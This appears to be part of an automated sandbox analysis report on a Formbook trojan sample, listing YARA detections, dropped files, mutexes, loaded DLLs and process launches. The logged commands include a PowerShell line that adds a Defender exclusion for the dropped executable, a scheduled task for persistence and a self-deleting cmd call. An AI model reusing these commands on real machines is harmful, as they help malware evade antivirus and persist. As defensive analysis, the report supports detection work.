Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KfYvtUBOq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@296/11@13/3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00723C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy, 15_2_00723C66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0072205A CoCreateInstance, 15_2_0072205A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Mutant created: \Sessions\1\BaseNamedObjects\FuBOvzWrVeorQDb
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File created: C:\Users\user\AppData\Local\Temp\tmp89CA.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Command line argument: WLDP.DLL 15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe Command line argument: localserver 15_2_00724136
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Virustotal: Detection: 24%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
